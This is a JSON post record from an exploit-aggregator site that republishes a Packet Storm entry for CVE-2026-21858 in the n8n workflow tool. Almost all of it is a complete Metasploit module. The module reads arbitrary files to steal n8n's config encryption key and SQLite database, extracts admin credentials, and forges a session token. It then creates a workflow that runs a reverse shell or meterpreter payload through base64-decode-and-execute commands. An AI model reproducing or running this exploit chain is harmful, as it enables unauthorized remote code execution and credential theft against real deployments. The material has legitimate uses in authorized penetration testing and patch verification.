{"id":41167,"date":"2026-02-17T12:46:12","date_gmt":"2026-02-17T12:46:12","guid":{"rendered":"http:\/\/localhost\/?p=41167"},"modified":"2026-02-17T12:46:12","modified_gmt":"2026-02-17T12:46:12","slug":"n8n-workflow-automation-remote-configuration-admin-data-extraction","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41167","title":{"rendered":"\ud83d\udcc4 n8n Workflow Automation Remote Configuration \/ Admin Data Extraction_PACKETSTORM:215730"},"content":{"rendered":"

{“lastseen”:”2026-02-17T18:14:57″,”description”:”This Metasploit module exploits multiple vulnerabilities in n8n workflow automation tool. It leverages a file read vulnerability to steal encryption keys and database, then uses stolen credentials to authenticate and execute arbitrary commands via the…”,”published”:”2026-02-17T00:00:00″,”modified”:”2026-02-17T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 n8n Workflow Automation Remote Configuration \/ Admin Data Extraction”,”source”:””,”references”:””,”id”:”PACKETSTORM:215730″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-21858″],”sourceData”:”=============================================================================================================================================\\n | # Title : n8n Workflow Automation – Remote Configuration \\u0026 Admin Data Extraction |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.3 (64 bits) |\\n | # Vendor : https:\/\/n8n.io\/ |\\n =============================================================================================================================================\\n \\n [+] Summary : This Metasploit module demonstrates a proof-of-concept (PoC) for exploiting misconfigurations in n8n workflow automation instances. It shows how an attacker could potentially:\\n \\n Read configuration files containing sensitive data (e.g., encryption keys).\\n \\n Extract administrator credentials from the SQLite database.\\n \\n Generate authentication tokens for privileged access.\\n \\n Optionally create and execute workflows to run commands (PoC only; not for real attacks).\\n \\n The module is intended for security research, penetration testing with explicit authorization, and vulnerability reporting. It includes safe error handling, retries, and cleanup procedures to minimize system impact.\\n \\n [+] POC : \\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n require ‘jwt’\\n require ‘sqlite3’\\n require ‘base64’\\n require ‘digest’\\n require ‘tempfile’\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ManualRanking\\n \\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::CmdStager\\n include Msf::Auxiliary::Report\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘n8n Unauthenticated Remote Code Execution’,\\n ‘Description’ =\\u003e %q{\\n This module exploits multiple vulnerabilities in n8n workflow automation tool.\\n It leverages a file read vulnerability to steal encryption keys and database,\\n then uses stolen credentials to authenticate and execute arbitrary commands\\n via the Execute Command node.\\n },\\n ‘Author’ =\\u003e [\\n ‘indoushka’\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-21858’],\\n [‘URL’, ‘https:\/\/n8n.io’]\\n ],\\n ‘Privileged’ =\\u003e false,\\n ‘Platform’ =\\u003e [‘linux’, ‘unix’],\\n ‘Arch’ =\\u003e [ARCH_CMD, ARCH_X86, ARCH_X64],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Linux Command’,\\n {\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Platform’ =\\u003e ‘unix’,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/unix\/reverse_bash’\\n }\\n }\\n ],\\n [\\n ‘Linux Dropper’,\\n {\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64],\\n ‘Platform’ =\\u003e ‘linux’,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘linux\/x64\/meterpreter\/reverse_tcp’\\n }\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2026-02-14’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n }\\n )\\n )\\n \\n register_options(\\n [\\n OptString.new(‘TARGETURI’, [true, ‘The base path to n8n’, ‘\/’]),\\n OptString.new(‘FORM_PATH’, [true, ‘Path to the vulnerable form endpoint’, ‘\/form\/’]),\\n OptString.new(‘HOME_DIR’, [true, ‘n8n home directory’, ‘\/home\/n8n’]),\\n OptString.new(‘BROWSER_ID’, [false, ‘Browser ID for session’, ‘msf_browser_’ + Rex::Text.rand_text_alphanumeric(8)]),\\n OptInt.new(‘WAIT_TIME’, [true, ‘Time to wait between requests’, 5]),\\n OptBool.new(‘FOLLOW_REDIRECT’, [true, ‘Follow HTTP redirects’, true]),\\n OptBool.new(‘CLEANUP’, [true, ‘Attempt to clean up created workflows’, true]),\\n OptInt.new(‘RETRY_COUNT’, [true, ‘Number of retries for failed requests’, 3]),\\n OptEnum.new(‘PAYLOAD_METHOD’, [true, ‘Method to execute payload’, ‘auto’, [‘auto’, ‘bash’, ‘sh’, ‘python3’, ‘python’]])\\n ]\\n )\\n end\\n \\n def ensure_payload_loaded\\n unless payload\\n print_error(\\”No payload configured. Use ‘set PAYLOAD \\u003cpayload\\u003e’\\”)\\n return false\\n end\\n true\\n end\\n \\n def parse_json_response(response, context = ‘response’)\\n return [nil, \\”No response to parse\\”] unless response\\n \\n begin\\n json_data = JSON.parse(response.body)\\n return [json_data, nil]\\n rescue JSON::ParserError =\\u003e e\\n error_msg = \\”Failed to parse JSON from #{context}: #{e.message}\\”\\n if datastore[‘VERBOSE’] \\u0026\\u0026 response.body\\n print_warning(\\”Raw response (first 200 chars): #{response.body[0..200]}\\”)\\n end\\n return [nil, error_msg]\\n end\\n end\\n \\n def send_request_with_retry(opts, expected_codes = [200])\\n retries = 0\\n expected_codes = [expected_codes] unless expected_codes.is_a?(Array)\\n \\n begin\\n opts[‘follow_redirect’] = datastore[‘FOLLOW_REDIRECT’] unless opts.key?(‘follow_redirect’)\\n res = send_request_cgi(opts)\\n \\n unless res\\n retries += 1\\n if retries \\u003c datastore[‘RETRY_COUNT’]\\n vprint_warning(\\”Request failed (no response), retrying (#{retries}\/#{datastore[‘RETRY_COUNT’]})…\\”)\\n sleep(1)\\n retry\\n else\\n return [nil, \\”No response after #{retries} retries\\”]\\n end\\n end\\n \\n if expected_codes.include?(res.code)\\n return [res, nil]\\n else\\n retries += 1\\n if retries \\u003c datastore[‘RETRY_COUNT’]\\n vprint_warning(\\”Request returned HTTP #{res.code} (expected #{expected_codes.join(‘, ‘)}), retrying…\\”)\\n sleep(1)\\n retry\\n else\\n return [res, \\”Unexpected HTTP code: #{res.code} (expected #{expected_codes.join(‘, ‘)})\\”]\\n end\\n end\\n \\n rescue =\\u003e e\\n retries += 1\\n if retries \\u003c datastore[‘RETRY_COUNT’]\\n vprint_warning(\\”Request error: #{e.message}, retrying (#{retries}\/#{datastore[‘RETRY_COUNT’]})…\\”)\\n sleep(1)\\n retry\\n else\\n return [nil, \\”Request failed after #{retries} retries: #{e.message}\\”]\\n end\\n end\\n end\\n \\n def read_file_via_form(filepath)\\n begin\\n base_uri = datastore[‘TARGETURI’]\\n base_uri = ‘\/’ if base_uri.empty?\\n \\n form_uri = normalize_uri(base_uri, datastore[‘FORM_PATH’])\\n \\n payload = {\\n ‘data’ =\\u003e {},\\n ‘files’ =\\u003e {\\n ‘file’ =\\u003e {\\n ‘filepath’ =\\u003e filepath,\\n ‘originalFilename’ =\\u003e ‘pwn.txt’\\n }\\n }\\n }.to_json\\n \\n vprint_status(\\”Attempting to read: #{filepath}\\”)\\n \\n res, error = send_request_with_retry({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e form_uri,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e payload\\n }, 200)\\n \\n unless res\\n print_error(\\”Failed to read #{filepath}: #{error}\\”)\\n return nil\\n end\\n \\n json_res, parse_error = parse_json_response(res, \\”file read POST response\\”)\\n \\n if parse_error\\n print_error(\\”Failed to parse response for #{filepath}: #{parse_error}\\”)\\n return nil\\n end\\n \\n waiting_url = json_res\\u0026.dig(‘formWaitingUrl’)\\n \\n unless waiting_url\\n print_error(\\”No formWaitingUrl in response for #{filepath}\\”)\\n return nil\\n end\\n \\n vprint_good(\\”Successfully triggered file read for #{filepath}\\”)\\n sleep(datastore[‘WAIT_TIME’])\\n \\n parsed_uri = URI.parse(waiting_url)\\n file_res, file_error = send_request_with_retry({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e parsed_uri.path,\\n ‘query’ =\\u003e parsed_uri.query\\n }, 200)\\n \\n if file_res\\n vprint_good(\\”Successfully retrieved #{filepath} (#{file_res.body.length} bytes)\\”)\\n return file_res.body\\n else\\n print_error(\\”Failed to retrieve file content for #{filepath}: #{file_error}\\”)\\n return nil\\n end\\n \\n rescue =\\u003e e\\n print_error(\\”Unexpected error reading #{filepath}: #{e.message}\\”)\\n print_error(\\”Backtrace: #{e.backtrace.join(\\”\\\\n\\”)}\\”) if datastore[‘VERBOSE’]\\n return nil\\n end\\n end\\n \\n def extract_encryption_key(config_data)\\n begin\\n if config_data =~ \/\\”encryptionKey\\”\\\\s*:\\\\s*\\”([^\\”]+)\\”\/\\n enc_key = $1\\n print_good(\\”Found encryption key: #{enc_key}\\”)\\n \\n every_other = (0…enc_key.length).step(2).map { |i| enc_key[i] }.join\\n final_secret = Digest::SHA256.hexdigest(every_other)\\n vprint_good(\\”Generated final secret: #{final_secret}\\”)\\n \\n return final_secret\\n else\\n print_error(\\”Could not find encryptionKey in config file\\”)\\n return nil\\n end\\n rescue =\\u003e e\\n print_error(\\”Error extracting encryption key: #{e.message}\\”)\\n return nil\\n end\\n end\\n \\n def extract_admin_data_sqlite(db_content)\\n temp_file = nil\\n db = nil\\n \\n begin\\n \\n temp_file = Tempfile.new([‘n8n_db’, ‘.sqlite’])\\n temp_file.binmode\\n temp_file.write(db_content)\\n temp_file.close\\n \\n db = SQLite3::Database.new(temp_file.path)\\n db.results_as_hash = true\\n \\n tables = db.execute(\\”SELECT name FROM sqlite_master WHERE type=’table’\\”)\\n table_names = tables.map { |t| t[‘name’] }\\n \\n unless table_names.include?(‘user’)\\n print_warning(\\”No ‘user’ table found in database. Available tables: #{table_names.join(‘, ‘)}\\”)\\n return nil\\n end\\n \\n columns = db.execute(\\”PRAGMA table_info(user)\\”)\\n column_names = columns.map { |c| c[‘name’] }\\n vprint_status(\\”User table columns: #{column_names.join(‘, ‘)}\\”)\\n \\n id_column = column_names.include?(‘id’) ? ‘id’ : nil\\n email_column = column_names.include?(’email’) ? ’email’ : nil\\n password_column = column_names.include?(‘password’) ? ‘password’ : nil\\n \\n unless id_column \\u0026\\u0026 email_column \\u0026\\u0026 password_column\\n print_error(\\”Required columns not found in user table\\”)\\n return nil\\n end\\n \\n role_columns = column_names.select { |c| c.include?(‘role’) }\\n \\n admin_query = nil\\n \\n if role_columns.any?\\n role_col = role_columns.first\\n admin_query = \\”SELECT #{id_column}, #{email_column}, #{password_column} FROM user WHERE #{role_col} IN (‘global:owner’, ‘global:admin’, ‘owner’, ‘admin’) LIMIT 1\\”\\n else\\n \\n admin_query = \\”SELECT #{id_column}, #{email_column}, #{password_column} FROM user ORDER BY createdAt ASC LIMIT 1\\”\\n end\\n \\n users = db.execute(admin_query)\\n \\n if users.any?\\n admin_id = users[0][id_column].to_s\\n admin_email = users[0][email_column]\\n admin_password = users[0][password_column]\\n \\n print_good(\\”Found admin via SQLite: #{admin_email} (ID: #{admin_id})\\”)\\n \\n combined = \\”#{admin_email}:#{admin_password}\\”\\n sha256_digest = Digest::SHA256.digest(combined)\\n admin_hash = Base64.strict_encode64(sha256_digest)[0..9]\\n vprint_good(\\”Generated admin hash: #{admin_hash}\\”)\\n \\n return {\\n ‘admin_id’ =\\u003e admin_id,\\n ‘admin_email’ =\\u003e admin_email,\\n ‘admin_password_hash’ =\\u003e admin_password,\\n ‘admin_hash’ =\\u003e admin_hash\\n }\\n else\\n print_warning(\\”No admin users found in database\\”)\\n return nil\\n end\\n \\n rescue SQLite3::Exception =\\u003e e\\n print_error(\\”SQLite parsing failed: #{e.message}\\”)\\n return nil\\n rescue =\\u003e e\\n print_error(\\”Error parsing SQLite: #{e.message}\\”)\\n return nil\\n ensure\\n db\\u0026.close if db\\n if temp_file\\n temp_file.close\\n temp_file.unlink\\n end\\n end\\n end\\n \\n def create_session_token(secret, admin_id, admin_hash)\\n begin\\n browser_id = datastore[‘BROWSER_ID’]\\n hashed_browser = Base64.strict_encode64(Digest::SHA256.digest(browser_id))\\n \\n payload = {\\n ‘id’ =\\u003e admin_id,\\n ‘hash’ =\\u003e admin_hash,\\n ‘browserId’ =\\u003e hashed_browser,\\n ‘usedMfa’ =\\u003e false,\\n ‘iat’ =\\u003e Time.now.to_i,\\n ‘exp’ =\\u003e Time.now.to_i + 86400\\n }\\n \\n token = JWT.encode(payload, secret, ‘HS256’)\\n vprint_good(\\”Created authentication token: #{token[0..30]}…\\”)\\n \\n return token\\n rescue =\\u003e e\\n print_error(\\”Failed to create JWT token: #{e.message}\\”)\\n return nil\\n end\\n end\\n \\n def create_workflow(token, command)\\n begin\\n base_uri = datastore[‘TARGETURI’]\\n base_uri = ‘\/’ if base_uri.empty?\\n \\n workflow_name = \\”exploit_#{Rex::Text.rand_text_numeric(6)}\\”\\n node_id = \\”node_#{Rex::Text.rand_text_alphanumeric(8)}\\”\\n \\n workflow_data = {\\n ‘name’ =\\u003e workflow_name,\\n ‘active’ =\\u003e false,\\n ‘nodes’ =\\u003e [\\n {\\n ‘parameters’ =\\u003e {\\n ‘command’ =\\u003e command\\n },\\n ‘name’ =\\u003e ‘Execute Command’,\\n ‘type’ =\\u003e ‘n8n-nodes-base.executeCommand’,\\n ‘typeVersion’ =\\u003e 1,\\n ‘position’ =\\u003e [250, 250],\\n ‘id’ =\\u003e node_id\\n }\\n ],\\n ‘connections’ =\\u003e {}\\n }.to_json\\n \\n res, error = send_request_with_retry({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(base_uri, ‘rest’, ‘workflows’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘headers’ =\\u003e {\\n ‘browser-id’ =\\u003e datastore[‘BROWSER_ID’]\\n },\\n ‘cookie’ =\\u003e \\”n8n-auth=#{token}\\”,\\n ‘data’ =\\u003e workflow_data\\n }, 200)\\n \\n unless res\\n print_error(\\”Failed to create workflow: #{error}\\”)\\n return nil\\n end\\n \\n json_res, parse_error = parse_json_response(res, \\”workflow creation\\”)\\n \\n if parse_error\\n print_error(\\”Failed to parse workflow creation response: #{parse_error}\\”)\\n return nil\\n end\\n \\n workflow_id = json_res\\u0026.dig(‘data’, ‘id’)\\n \\n unless workflow_id\\n print_error(\\”No workflow ID in response\\”)\\n return nil\\n end\\n \\n print_good(\\”Created workflow: #{workflow_id}\\”)\\n return json_res[‘data’]\\n \\n rescue =\\u003e e\\n print_error(\\”Error creating workflow: #{e.message}\\”)\\n return nil\\n end\\n end\\n \\n def execute_workflow(token, workflow_info)\\n begin\\n return [nil, \\”No workflow info\\”] unless workflow_info\\u0026.dig(‘id’)\\n \\n base_uri = datastore[‘TARGETURI’]\\n base_uri = ‘\/’ if base_uri.empty?\\n \\n workflow_id = workflow_info[‘id’]\\n \\n run_res, run_error = send_request_with_retry({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(base_uri, ‘rest’, ‘workflows’, workflow_id, ‘run’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘headers’ =\\u003e {\\n ‘browser-id’ =\\u003e datastore[‘BROWSER_ID’]\\n },\\n ‘cookie’ =\\u003e \\”n8n-auth=#{token}\\”,\\n ‘data’ =\\u003e { ‘workflowData’ =\\u003e workflow_info }.to_json\\n }, 200)\\n \\n unless run_res\\n return [nil, \\”Failed to execute workflow: #{run_error}\\”]\\n end\\n \\n json_res, parse_error = parse_json_response(run_res, \\”execution\\”)\\n \\n if parse_error\\n return [nil, \\”Failed to parse execution response: #{parse_error}\\”]\\n end\\n \\n execution_id = json_res\\u0026.dig(‘data’, ‘executionId’)\\n \\n unless execution_id\\n return [nil, \\”No execution ID in response\\”]\\n end\\n \\n vprint_good(\\”Executed workflow, execution ID: #{execution_id}\\”)\\n \\n sleep(2)\\n \\n result_res, result_error = send_request_with_retry({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(base_uri, ‘rest’, ‘executions’, execution_id),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘headers’ =\\u003e {\\n ‘browser-id’ =\\u003e datastore[‘BROWSER_ID’]\\n },\\n ‘cookie’ =\\u003e \\”n8n-auth=#{token}\\”\\n }, 200)\\n \\n unless result_res\\n return [nil, \\”Failed to get execution result: #{result_error}\\”]\\n end\\n \\n json_res, parse_error = parse_json_response(result_res, \\”execution result\\”)\\n \\n if parse_error\\n return [nil, \\”Failed to parse execution result: #{parse_error}\\”]\\n end\\n \\n raw_data = json_res\\u0026.dig(‘data’, ‘data’)\\n \\n unless raw_data\\n return [nil, \\”No data in execution result\\”]\\n end\\n \\n begin\\n exec_data = JSON.parse(raw_data)\\n output = extract_command_output(exec_data)\\n return [output, nil]\\n rescue JSON::ParserError\\n return [raw_data, nil]\\n end\\n \\n rescue =\\u003e e\\n return [nil, \\”Error executing workflow: #{e.message}\\”]\\n end\\n end\\n \\n def extract_command_output(exec_data)\\n if exec_data.is_a?(Array)\\n exec_data.reverse.each do |item|\\n if item.is_a?(String) \\u0026\\u0026 !item.empty? \\u0026\\u0026 item != ‘Execute Command’ \\u0026\\u0026 !item.start_with?(‘node-‘)\\n return item.strip\\n end\\n end\\n end\\n \\”No output captured\\”\\n end\\n \\n def cleanup_workflows(token, workflow_ids)\\n return unless datastore[‘CLEANUP’] \\u0026\\u0026 workflow_ids\\u0026.any?\\n \\n print_status(\\”Cleaning up #{workflow_ids.length} workflows…\\”)\\n \\n base_uri = datastore[‘TARGETURI’]\\n base_uri = ‘\/’ if base_uri.empty?\\n \\n workflow_ids.each do |wf_id|\\n begin\\n res, error = send_request_with_retry({\\n ‘method’ =\\u003e ‘DELETE’,\\n ‘uri’ =\\u003e normalize_uri(base_uri, ‘rest’, ‘workflows’, wf_id),\\n ‘headers’ =\\u003e {\\n ‘browser-id’ =\\u003e datastore[‘BROWSER_ID’]\\n },\\n ‘cookie’ =\\u003e \\”n8n-auth=#{token}\\”\\n }, [200, 204, 404]) # 404 \u064a\u0639\u0646\u064a \u0623\u0646\u0647 \u0645\u062d\u0630\u0648\u0641 \u0628\u0627\u0644\u0641\u0639\u0644\\n \\n if res \\u0026\\u0026 (res.code == 200 || res.code == 204)\\n print_status(\\”Cleaned up workflow: #{wf_id}\\”)\\n elsif res \\u0026\\u0026 res.code == 404\\n print_status(\\”Workflow #{wf_id} already deleted\\”)\\n else\\n print_warning(\\”Failed to delete workflow #{wf_id}: #{error}\\”)\\n end\\n rescue =\\u003e e\\n print_warning(\\”Error during cleanup of workflow #{wf_id}: #{e.message}\\”)\\n end\\n end\\n end\\n \\n def check\\n begin\\n \\n test_file = \\”#{datastore[‘HOME_DIR’]}\/.n8n\/config\\”\\n data = read_file_via_form(test_file)\\n \\n if data \\u0026\\u0026 data.include?(‘encryptionKey’)\\n print_good(\\”Target appears vulnerable – found encryption key in config\\”)\\n return Exploit::CheckCode::Vulnerable\\n end\\n \\n return Exploit::CheckCode::Safe\\n \\n rescue =\\u003e e\\n print_error(\\”Error during check: #{e.message}\\”)\\n return Exploit::CheckCode::Unknown\\n end\\n end\\n \\n def select_payload_method\\n method = datastore[‘PAYLOAD_METHOD’]\\n \\n if method == ‘auto’\\n \\n [\\n [‘bash’, ‘bash -c’],\\n [‘sh’, ‘sh -c’],\\n [‘python3’, ‘python3 -c’],\\n [‘python’, ‘python -c’]\\n ].each do |name, _|\\n return name\\n end\\n return ‘bash’ \\n end\\n \\n method\\n end\\n \\n def generate_compatible_payload\\n unless ensure_payload_loaded\\n return nil\\n end\\n \\n case target[‘Arch’]\\n when ARCH_CMD\\n command = payload.encoded\\n \\n if command.length \\u003e 1000\\n print_warning(\\”Command payload is very long (#{command.length} chars)\\”)\\n end\\n vprint_status(\\”Using command payload\\”)\\n return command\\n \\n else\\n \\n payload_b64 = Rex::Text.encode_base64(payload.encoded)\\n method = select_payload_method\\n \\n commands = {\\n ‘bash’ =\\u003e \\”echo #{payload_b64} | base64 -d | bash\\”,\\n ‘sh’ =\\u003e \\”echo #{payload_b64} | base64 -d | sh\\”,\\n ‘python3’ =\\u003e \\”echo #{payload_b64} | python3 -c ‘import base64,sys; exec(base64.b64decode(sys.stdin.read()))’\\”,\\n ‘python’ =\\u003e \\”echo #{payload_b64} | python -c ‘import base64,sys; exec(base64.b64decode(sys.stdin.read()))’\\”\\n }\\n \\n selected_command = commands[method]\\n \\n if selected_command\\n print_status(\\”Using #{method} method for payload execution\\”)\\n return selected_command\\n else\\n \\n print_warning(\\”Unknown method #{method}, falling back to bash\\”)\\n return commands[‘bash’]\\n end\\n end\\n end\\n \\n def exploit\\n print_status(\\”Starting n8n exploitation…\\”)\\n \\n unless ensure_payload_loaded\\n return\\n end\\n \\n created_workflows = []\\n token = nil\\n admin_data = nil\\n secret = nil\\n \\n begin\\n \\n print_status(\\”Step 1: Stealing configuration file…\\”)\\n config_path = \\”#{datastore[‘HOME_DIR’]}\/.n8n\/config\\”\\n config_data = read_file_via_form(config_path)\\n \\n unless config_data\\n print_error(\\”Failed to read config file. Target may not be vulnerable or path is incorrect.\\”)\\n return\\n end\\n \\n print_status(\\”Step 2: Extracting encryption key…\\”)\\n secret = extract_encryption_key(config_data)\\n unless secret\\n print_error(\\”Failed to extract encryption key\\”)\\n return\\n end\\n \\n print_status(\\”Step 3: Stealing database file…\\”)\\n db_path = \\”#{datastore[‘HOME_DIR’]}\/.n8n\/database.sqlite\\”\\n db_data = read_file_via_form(db_path)\\n \\n unless db_data\\n print_error(\\”Failed to read database file\\”)\\n return\\n end\\n \\n print_status(\\”Step 4: Extracting admin credentials…\\”)\\n admin_data = extract_admin_data_sqlite(db_data)\\n \\n unless admin_data\\n print_error(\\”Failed to extract admin data using SQLite parser\\”)\\n print_error(\\”Database may be corrupted or from different n8n version\\”)\\n return\\n end\\n \\n print_good(\\”Successfully extracted admin credentials for: #{admin_data[‘admin_email’]}\\”)\\n \\n print_status(\\”Step 5: Creating authentication token…\\”)\\n token = create_session_token(secret, admin_data[‘admin_id’], admin_data[‘admin_hash’])\\n \\n unless token\\n print_error(\\”Failed to create authentication token\\”)\\n return\\n end\\n \\n print_status(\\”Step 6: Preparing payload…\\”)\\n command = generate_compatible_payload\\n \\n unless command\\n print_error(\\”Failed to generate payload\\”)\\n return\\n end\\n \\n print_status(\\”Step 7: Creating malicious workflow…\\”)\\n workflow_info = create_workflow(token, command)\\n \\n unless workflow_info\\n print_error(\\”Failed to create workflow\\”)\\n return\\n end\\n \\n created_workflows \\u003c\\u003c workflow_info[‘id’]\\n \\n print_status(\\”Step 8: Executing payload…\\”)\\n output, error = execute_workflow(token, workflow_info)\\n \\n if error\\n print_warning(\\”Execution completed with warning: #{error}\\”)\\n end\\n \\n if output \\u0026\\u0026 output != \\”No output captured\\”\\n print_good(\\”Command executed successfully!\\”)\\n print_line(\\”\\\\n#{output}\\\\n\\”)\\n else\\n print_warning(\\”No output captured, but payload may have executed\\”)\\n end\\n \\n print_status(\\”Step 9: Saving loot…\\”)\\n \\n loot_path = store_loot(\\n ‘n8n.config’,\\n ‘text\/plain’,\\n rhost,\\n config_data,\\n ‘n8n_config.txt’,\\n ‘n8n Configuration File’\\n )\\n print_good(\\”Saved config to: #{loot_path}\\”)\\n \\n loot_path = store_loot(\\n ‘n8n.database’,\\n ‘application\/x-sqlite3’,\\n rhost,\\n db_data,\\n ‘n8n_database.sqlite’,\\n ‘n8n SQLite Database’\\n )\\n print_good(\\”Saved database to: #{loot_path}\\”)\\n \\n print_good(\\”Exploitation completed!\\”)\\n \\n rescue =\\u003e e\\n print_error(\\”Unexpected error during exploitation: #{e.message}\\”)\\n if datastore[‘VERBOSE’]\\n print_error(\\”Backtrace: #{e.backtrace.join(\\”\\\\n\\”)}\\”)\\n end\\n ensure\\n \\n if token \\u0026\\u0026 created_workflows.any?\\n cleanup_workflows(token, created_workflows)\\n elsif created_workflows.any?\\n print_warning(\\”Cannot clean up workflows without authentication token\\”)\\n end\\n end\\n end\\n end\\n \\t\\n Greetings to :======================================================================\\n jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\\n ====================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215730″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215730\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-17T18:14:57″,”description”:”This Metasploit module exploits multiple vulnerabilities in n8n workflow automation tool. It leverages a file read vulnerability to steal encryption keys and database, then uses…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-41167","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 n8n Workflow Automation Remote Configuration \/ Admin Data Extraction_PACKETSTORM:215730 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41167\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 n8n Workflow Automation Remote Configuration \/ Admin Data Extraction_PACKETSTORM:215730 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-17T18:14:57″,”description”:”This Metasploit module exploits multiple vulnerabilities in n8n workflow automation tool. It leverages a file read vulnerability to steal encryption keys and database, then uses...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41167\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-17T12:46:12+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"19 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41167#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41167\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 n8n Workflow Automation Remote Configuration \\\/ Admin Data Extraction_PACKETSTORM:215730\",\"datePublished\":\"2026-02-17T12:46:12+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41167\"},\"wordCount\":3750,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41167#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41167\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41167\",\"name\":\"\ud83d\udcc4 n8n Workflow Automation Remote Configuration \\\/ Admin Data Extraction_PACKETSTORM:215730 - zero 